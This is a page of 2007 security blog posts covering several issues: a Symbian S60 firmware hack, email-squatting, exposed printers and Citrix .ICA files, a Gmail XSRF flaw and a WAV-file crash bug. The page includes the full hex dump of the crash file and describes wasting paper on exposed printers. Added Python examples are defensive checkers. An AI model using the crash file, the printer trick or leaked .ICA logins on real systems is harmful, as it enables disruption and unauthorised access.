Symbian S60 3rd edition hacked - and Nokia’s October response

A blog called Symbaali.info has released information on hacking S60 3rd Edition firmware by flashing a modified update.
According to the blog, the new Nokia Software Updater prevents this Symbian hack from working.

The key step appears to be editing the swipolicy.ini file.

Granting the AllFiles capability there makes the entire file system browsable.

The author has released several screenshots confirming access to the Sys folder as well.

The earlier entries from this month are at symbaali.info/2007_10_01_archive.html. The site is registered to Mr. Roger Muhmu using the contact address of a local company, Peekpoke, whose Web site lists a P.O. Box address in Jyväskylä, Finland.

Security professionals here in Finland have confirmed the issue, and Nokia’s Corporate Security department is aware of it. The following devices have been verified as affected: Nokia N73, E61 and E90.

Ron Liechty of Forum Nokia confirmed the issue on Monday, 29 October.


Gmail as an email honeypot

You all remember cybersquatting, a popular sport in the late 90s, right?
McDonalds.com, JenniferLopez.com, Hertz.com and Avon.com thankfully all point to the right web sites today, but thaiairline.com, mcdonald.com, luftansa.com, gugle.com, barnesandnobles.com and other misspellings are fake web sites intended to trap the casual surfer whose hand is a bit quicker than the eye.

These web site traps are successful because web sites are so easy to remember that people don’t bother bookmarking them. It used to be that if you wanted to know the weather in Minnesota you had to go to http://www.geocities.com/Athens/rubytuesday71/weatherinminnesota281007.html . Today you go to weather.com (or type “weather for Minnesota” into Google) and get an immediate response.
If you want to go to the McDonalds web site, you don’t even spend the 10 seconds to look it up: you type McDonalds.com and expect to see the latest dollar meal menu.
The same is true for the other popular form of communication, email. If I know a person’s name and company (or free email provider) I will generally just type the address in rather than look it up in my address book.
Of course, back in the Hotmail days, when John was john_sm1th253@hotmail.com, I couldn’t rely on memory alone. But today, unless your name is John Smith, it’s probably not too hard to get a decent firstname.lastname combination on Gmail, Yahoo or some other free mail system, and certainly on your corporate email system.

So will we start seeing cybersquatting on email addresses? Maybe we already do. There is no real way to know who is behind a given email address, and while it’s merely funny if a guy named Roo Taylor gets root@aol.com, it could be dangerous if some bad guy owns john@gmail.com, johnsmith@gmail.com, johns@gmail.com and so on. Imagine how much legitimate mail is accidentally sent to those accounts by people who send the latest budget figures to their boss at work and also CC his personal address so he can read it from his home machine.

I have first-hand experience of this ‘attack’. Luckily for me I’ve got the login aviram@gmail.com (piece of cake; all you need is a “Google-in-law”. For me it was as simple as my office neighbor’s wife having a cousin who works for Google. They sign you up for a new experimental beta Google product called “Google Mail” and you not only get to pick your first name as login, but also get to send invites to a bunch of envious friends). As Gmail becomes more popular I’m receiving invitations to birthday parties of people I don’t know, detailed minutes of brainstorming meetings I’ve never been to, and last week a bunch of emails with a list of hospital equipment and inventory, all meant for some other ‘Aviram’. I can’t imagine what would have happened if my first name were more common. I’m also pretty sure it’s still possible to register Gmail accounts with common misspellings and dig out some of the emails that come in.

At the very least, this gives the bad guys a fresh harvest of active email addresses. But if they’re lucky, they may receive an email carrying a personal story that can be exploited further. Think of a young guy sending his parents pictures of his African safari from an Internet cafe. A simple typo sends the email to our bad guy, who then forges a follow-up email to the parents saying his wallet was stolen and they need to wire money to help their stranded son.

Cybersquatting is easy to identify and is usually settled in court. With “email-squatting” I don’t see a clear and obvious solution; in the meanwhile, be sure to send only to addresses from your address book…
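As an added example, not part of the original post: a Python sketch of the address-book check suggested above, applied at send time. It flags a recipient that is absent from the address book but one keystroke away from an entry (the john.smith / jhon.smith case), and it enumerates the single-keystroke variants of a local part that an email-squatter could register (or a domain owner could reserve). The address book and addresses are constructed for the example.

```python
# Constructed address book for the example; the entries are invented.
ADDRESS_BOOK = {
    "john.smith@example.com",
    "aviram@example.com",
    "accounting@example.com",
}


def edit_distance(a, b):
    """Optimal string alignment distance: insertions, deletions, substitutions
    and adjacent transpositions each cost 1, so 'jhon' is one edit from 'john'."""
    prev2, prev1 = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            d = min(prev1[j] + 1, cur[j - 1] + 1, prev1[j - 1] + cost)
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                d = min(d, prev2[j - 2] + 1)  # adjacent transposition
            cur.append(d)
        prev2, prev1 = prev1, cur
    return prev1[-1]


def near_misses(address, book=ADDRESS_BOOK, max_distance=1):
    """Address-book entries the given address is probably a typo of."""
    a = address.strip().lower()
    return sorted(c for c in book if c != a and edit_distance(a, c) <= max_distance)


def check_recipients(recipients, book=ADDRESS_BOOK):
    """Send-time check: map each unknown recipient to the contacts it is one
    keystroke away from, so the sender can confirm before the mail leaves."""
    flagged = {}
    for r in recipients:
        if r.strip().lower() in book:
            continue  # exact address-book hit, nothing to ask
        near = near_misses(r, book)
        if near:
            flagged[r] = near
    return flagged


def local_part_variants(local):
    """Single-keystroke misspellings of a local part (dropped, doubled or swapped
    character): the set a squatter could register on a free-mail provider."""
    out = set()
    for i in range(len(local)):
        out.add(local[:i] + local[i + 1:])                                # dropped
        out.add(local[:i] + local[i] + local[i:])                         # doubled
        if i + 1 < len(local):
            out.add(local[:i] + local[i + 1] + local[i] + local[i + 2:])  # swapped
    out.discard(local)
    return out


if __name__ == "__main__":
    print(check_recipients(["jhon.smith@example.com", "aviram@example.com", "bob@example.com"]))
    print(sorted(local_part_variants("aviram")))
```

The check compares whole addresses after lower-casing, so a wrong domain (gmial.com) is caught the same way as a wrong local part; a mail client would present the flagged map as a "did you mean" prompt rather than silently sending.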


Prevent paper-waste

I have noticed that a few people have been careless enough to leave the HTTP interface of their HP LaserJet (other models are probably also relevant) open to the Internet. Even though most of the functionality is disabled, you can still screw around with it by asking it to print the font list, which isn’t a total waste :) of paper unless you do this repeatedly until the printer runs out of paper.

I would recommend NOT allowing your printers to be visible from the Internet.

(BTW: I found 20 such devices open, but I guess a better Google query could find more.)


Memory Leak #23 (comic strip)

Memory Leak strip #23 is devoted to all you gadget lovers out there.

(Thanks to the Z.Z. for the idea)
Memory Leak #23

Click on the image for full size.


Does Technology Breed Crime?

Anywhere you have connectivity combined with the absence of a functioning judicial system, you will breed crime. It doesn’t matter what that connectivity is, or how you measure it, whether in paved roads, running water or electricity: each of these factors extends both the reach of commerce and the reach of criminals. The two cannot be divorced from each other. If you have a rapid expansion of transportation without an equal expansion of police power, criminals will exploit that weakness. In the Wild West, outlaws robbed trains as they crossed the nation, knowing that the trains were vulnerable and there was little chance of being caught (as it happens, the development of the telegraph put an end to train robberies).

Let’s look at Russia. Back in the Cold War era, technology export restrictions were in place. With the fall of the Iron Curtain, those restrictions were relaxed. By the time we in the United States started going online en masse in 1995, upgrading our computer systems to Pentium machines running Windows 95, our old computer systems didn’t go into the garbage; they were sold into the huge technological vacuum of the former Soviet Union.

Who are the early adopters of technology? Kids, of course! And Russia was no exception. Like a 16-year-old with a hot rod, the youths started souping up computers that we considered garbage. They got onto the Internet using whatever they could, and once they connected to our information flows, they started teaching themselves programming. Because they were learning to program on outdated equipment, they were forced to become very, very good. There was no such thing as code bloat. Then add 5 years to the calendar and what do you have? Little Ivan is no longer 15, he is 20 and has 5 years of experience, and therein lies the rub: Ivan cannot go out and get a job in information technology, because there is no economy to support his skill set. So he goes about earning a living any way he can. I call it “N0 RUL3Z, JU5T WR1T3”. Ivan sets about writing spam software, creating Trojan horses, worms… and this is where we see the emergence of the botnet.

Brazil wasn’t far behind. In 2004-2005 we saw an uptick in the botnet arms race, with Russia being one-upped by Brazil in the Beagle/Bagle, Mydoom and Sasser botnet pissing contest.

There is a tide shift taking place. Putin has implemented a 13% flat tax, which is bringing revenue into the Russian economy for the first time in 15 years. They are reviving their legal system because they want to attract Foreign Direct Investment dollars, which will never come if they have no legal system that can enforce a contract. Along with civil justice and FDI dollars, criminal justice must rein in corruption, otherwise the FDI dollars will quickly disappear. So Russia is growing out of the script kiddie phase and re-emerging onto the world scene. It’s good to have Mother Russia back (New & Improved, Now with 1337 H4x0rs!).

I could go on providing details of history and economics, but I will leave that for later. I will pose this question for you to think about: what effect do you think One Laptop Per Child will have on the future of cybercrime? If connectivity absent a legal system is the breeding ground for crime, what do you think will happen as the bottom billion in Africa get online?

Computer security is all about dealing with unintended consequences. Every computer and every system ever built was first built to share information, not to secure it. Security came only after we got everything connected and then had the collective “aww, crap!” moment.

I see another one of those moments coming up on the horizon. Do you? I’m interested in hearing your comments on what the future has in store for security.


Statistics vs. Probability - Did POTRIPPER Cheat?

This is a bit pointless, as I’m blogging about a “controversy” that has already been settled. I do think there are useful tools to take from this incident, though.

For those out of the loop: a few days ago, players of the online poker site “Absolute Poker” (no link, deal with it) accused a player called “POTRIPPER” of playing while being able to see the hole cards. I’ll save the poker layman the task of figuring out what that means (as I had to): in that variant of poker some of the cards are shown, while others are hidden. People were accusing POTRIPPER of playing while being able to see everyone’s hidden cards.

I should point out that this is a settled controversy. Absolute Poker admitted that this is the work of an internal security breach. I am less interested in the specific case, however, than I am in looking at tools designed to answer the “how can we know” question. (more…)


New Netscape Navigator 9 ships security fixes and is multi-platform

Netscape Navigator 9 has been released recently. The previous version, Netscape Browser 8.1, was released in April and was Windows-only. It is worth noting that the latest version is not called Netscape Browser 9 or Netscape 9; it is Netscape Navigator 9.

The new version was released at browser.netscape.com/downloads/.

It appears that no official Security Alert page is available, but the Release Notes document and the User-Agent string confirm that the new version is based on the Mozilla Firefox 2.0.0.7 codebase.

The latest vulnerability fixed in Firefox 2.0.0.7 is the QuickTime issue (CVE-2006-4965). For comparison, the previous version (Netscape 8.1.3) was at Gecko rv:1.7.5 (20070321).

The typical Windows XP User-Agent string is: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8pre) Gecko/20071015 Firefox/2.0.0.7 Navigator/9.0


XSS at Cnn.com - again

In August we saw a cross-domain injection type XSS report from CLPWN related to Cnn.com.

The target was Search.cnn.com.

This week, Xssed.com reports a new issue.

According to the ‘Additional information’ field of the report, the XSS is in the “Get your local weather and news” form. No exact injection string was given.

Additionally, the Xssed database lists the issue as unfixed.


PCM 0day (Divide by Zero)

The debate about the term “zero day” is not directly related to the PCM vulnerability I am about to reveal, but as this vulnerability is not publicly documented, as far as I know, I will call it a 0day.

The vulnerability lets you crash mplay32.exe, which for some reason still ships with Windows up to Server 2003 (maybe also Vista; can someone confirm?). This low-quality, feature-lacking player contains a bug where a malformed PCM (WAV) file makes it divide a number by zero. In the file below, the fmt chunk’s block-align field (the two bytes at offset 0x20) is zero, while the RIFF and data chunk sizes claim 0x1a000000 bytes in a 70-byte file; any code that derives a sample or buffer count by dividing by block-align will divide by zero:

00000000  52 49 46 46 24 00 00 1a  57 41 56 45 66 6d 74 20  |RIFF$...WAVEfmt |
00000010  10 00 00 00 01 00 02 00  44 ac 00 00 88 58 01 00  |........D....X..|
00000020  00 00 10 00 64 61 74 61  00 00 00 1a 00 00 24 17  |....data......$.|
00000030  1e f3 3c 13 3c 14 16 f9  18 f9 34 e7 23 a6 3c f2  |..<.<.....4.#.<.|
00000040  24 f2 11 ce 1a 0d                                 |$.....|
00000046
Is this vulnerability interesting? Not really: mplay32.exe is no longer the default player (unless you are still in the stone age, i.e. have never upgraded your system or Internet Explorer), and it allows you to do nothing but crash the player.

If someone can find out more about this issue, I will be happy to hear.

BTW: this PCM vulnerability was discovered by beSTORM’s PCM (WAV) fuzzing module, which was run against mplay32.exe.
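As an added example, not code from the original post or from beSTORM: a Python parser that walks the RIFF chunks of the dumped file, shows where a player that trusts the header divides by zero, and lists the consistency checks a hardened player should apply before doing any arithmetic on the header. The 70 bytes are exactly those in the dump above; the field names follow the standard WAVE fmt chunk layout (format tag, channels, sample rate, byte rate, block align, bits per sample).

```python
import struct

# The crash file from the post, byte for byte (70 bytes).
POC_WAV = bytes.fromhex(
    "52494646 2400001a 57415645 666d7420"
    "10000000 01000200 44ac0000 88580100"
    "00001000 64617461 0000001a 00002417"
    "1ef33c13 3c1416f9 18f934e7 23a63cf2"
    "24f211ce 1a0d"
)

FMT_FIELDS = ("format", "channels", "sample_rate", "byte_rate", "block_align", "bits")


def parse_wav_header(buf):
    """Walk the RIFF chunk list and return the fmt fields plus data chunk sizes.
    Sizes are reported as claimed by the header; nothing beyond len(buf) is read."""
    if len(buf) < 12 or buf[:4] != b"RIFF" or buf[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    info = {"riff_size": struct.unpack_from("<I", buf, 4)[0], "file_size": len(buf)}
    pos = 12
    while pos + 8 <= len(buf):
        cid, csize = struct.unpack_from("<4sI", buf, pos)
        body = pos + 8
        if cid == b"fmt ":
            if csize < 16 or body + 16 > len(buf):
                raise ValueError("truncated fmt chunk")
            info.update(zip(FMT_FIELDS, struct.unpack_from("<HHIIHH", buf, body)))
        elif cid == b"data":
            info["data_size"] = csize               # what the header claims
            info["data_present"] = len(buf) - body  # what is really in the file
        pos = body + csize + (csize & 1)            # chunks are word aligned
    return info


def naive_frame_count(info):
    """What a player that trusts the header computes: data bytes / bytes per frame.
    With the PoC this raises ZeroDivisionError, the Python equivalent of the crash."""
    return info["data_size"] // info["block_align"]


def validate_fmt(info):
    """Consistency checks a hardened player must pass before any arithmetic."""
    problems = []
    if info.get("format") != 1:
        problems.append("format tag is not PCM")
    ch, bits = info.get("channels", 0), info.get("bits", 0)
    if ch == 0 or bits == 0 or bits % 8:
        problems.append("channels/bits per sample invalid")
    expected_align = ch * bits // 8
    if expected_align == 0 or info.get("block_align") != expected_align:
        problems.append("block_align %r != channels*bits/8 (%d)"
                        % (info.get("block_align"), expected_align))
    if info.get("byte_rate") != info.get("sample_rate", 0) * expected_align:
        problems.append("byte_rate does not match sample_rate*block_align")
    if "data_size" not in info:
        problems.append("no data chunk")
    elif info["data_size"] > info["data_present"]:
        problems.append("data chunk claims more bytes than the file holds")
    if info["riff_size"] + 8 != info["file_size"]:
        problems.append("RIFF size does not match file length")
    return problems


def safe_frame_count(info):
    """Frame count computed only after validation and only over bytes actually present."""
    problems = validate_fmt(info)
    if problems:
        raise ValueError("; ".join(problems))
    return min(info["data_size"], info["data_present"]) // info["block_align"]


def build_wav(channels, sample_rate, bits, pcm):
    """Assemble a well-formed PCM WAV so the checks can be seen passing."""
    align = channels * bits // 8
    fmt = struct.pack("<HHIIHH", 1, channels, sample_rate, sample_rate * align, align, bits)
    body = (b"WAVE" + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", len(pcm)) + pcm)
    return b"RIFF" + struct.pack("<I", len(body)) + body


if __name__ == "__main__":
    poc = parse_wav_header(POC_WAV)
    print("PoC fmt:", {k: poc.get(k) for k in FMT_FIELDS})
    print("PoC problems:", validate_fmt(poc))
    try:
        naive_frame_count(poc)
    except ZeroDivisionError:
        print("naive player: division by zero (block_align == 0)")
    good = parse_wav_header(build_wav(2, 44100, 16, b"\x00" * 16))
    print("well-formed file: %d frames, problems=%r" % (safe_frame_count(good), validate_fmt(good)))
```

Besides the zero block-align, the parser shows that the PoC’s byte rate (88200) does not match 44100 * 4 for stereo 16-bit audio and that both size fields claim far more data than the file holds, so a player that cross-checks the fmt fields against each other and against the real file length rejects it before reaching the division.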


Leave your Citrix .ICA files on a public server and let the hacker in

Mr. Petko D. ‘Acrobat-Gmail’ Petkov has reported a very interesting Citrix issue:

By searching for publicly exposed .ICA (Independent Computing Architecture) files you can do serious things on the remote system with the information they contain: opening cmd.exe and listing the file system works, etc.

Report here and a 1:28 min YouTube video here.
Google dork and Yahoo dork(!) included; it appears there are many .mil and .gov sites, and hospitals too.
A real-life example: a Finnish high school in Jyväskylä fixed its problem less than 20 minutes after receiving my e-mail this morning. Fine!
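As an added example, not from the original report: a Python audit that walks a web document root for published .ICA launch files and reports what each one hands an attacker. The sample .ICA content is constructed; its keys (Address, InitialProgram, Username, Domain, ClearPassword) are standard ICA launch-file keys, and the severity ranking is this example’s own.

```python
import configparser
import os

# Constructed launch file of the kind found on public web servers; values are invented.
SAMPLE_ICA = """\
[WFClient]
Version=2
ClientName=anonymous

[ApplicationServers]
Intranet Desktop=

[Intranet Desktop]
Address=10.20.30.40
InitialProgram=#Intranet Desktop
Username=student
Domain=SCHOOL
ClearPassword=Welcome1
Compress=On
"""

# Keys whose presence means the file logs the attacker in without asking anything.
CREDENTIAL_KEYS = ("Username", "Domain", "Password", "ClearPassword")


def audit_ica(text, source="<string>"):
    """Return one finding per application entry: target server, launched program,
    any embedded credentials and a severity derived from them."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text, source=source)
    findings = []
    for section in cp.sections():
        if not cp.has_option(section, "Address"):
            continue  # [WFClient] and [ApplicationServers] carry no server target
        creds = {k: cp.get(section, k) for k in CREDENTIAL_KEYS if cp.has_option(section, k)}
        has_secret = any(k in creds for k in ("Password", "ClearPassword"))
        findings.append({
            "source": source,
            "app": section,
            "address": cp.get(section, "Address"),
            "initial_program": cp.get(section, "InitialProgram", fallback=""),
            "credentials": creds,
            # Any Address discloses an internal server and gives a session to try;
            # a stored password gives a ready-made interactive logon.
            "severity": "high" if has_secret else "medium",
        })
    return findings


def scan_webroot(root):
    """Walk a document root and audit every *.ica file found under it."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".ica"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    results.extend(audit_ica(fh.read(), source=path))
    return results


if __name__ == "__main__":
    for f in audit_ica(SAMPLE_ICA, source="sample.ica"):
        print(f["severity"].upper(), f["app"], "->", f["address"],
              "program:", f["initial_program"], "creds:", sorted(f["credentials"]))
```

Run scan_webroot against the document root of each public web server (the same files the Google and Yahoo dorks find from the outside); any finding at all means the launch file should be moved behind authentication, and a high finding means the embedded account needs its password changed as well.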


Hey, don’t touch my Gmail filters with XSRF

The good news is that Google has fixed a serious cross-site request forgery vulnerability in Gmail.

The exploitation technique was interesting: modifying Gmail’s forwarding settings with JavaScript.

US-CERT Vulnerability Note VU#571584 is located here.


Your chance to take down SecuriTeam blogs

If there’s anyone out there who wants to take down the SecuriTeam blogs once and for all, here’s your chance.
On Thursday Sunshine, Noam and I will be on the same airplane flying to TRSEC in Istanbul. In case of an airplane crash, the root password will be lost forever and, save for the daily post from Juha-Matti, the blogs will go dark with no one else writing (yes, fellow SecuriTeam bloggers, I *am* looking at you).

Anyway, if you’re in the area, Istanbul is a great place to visit this time of year. Mail us for an invitation (we’ve got a bunch of “SecuriTeam” tickets reserved) and come by on Friday to Profilo Alışveriş Merkezi to say hello, and we’ll buy you a beer^h^h^h^h coke (Turkey is a Muslim country).


Insecurity #15 (comic strip)

Insecurity, strip #15 of this new comic series.

Insecurity #6

Click on the image for full size.


Vulnerability Scanner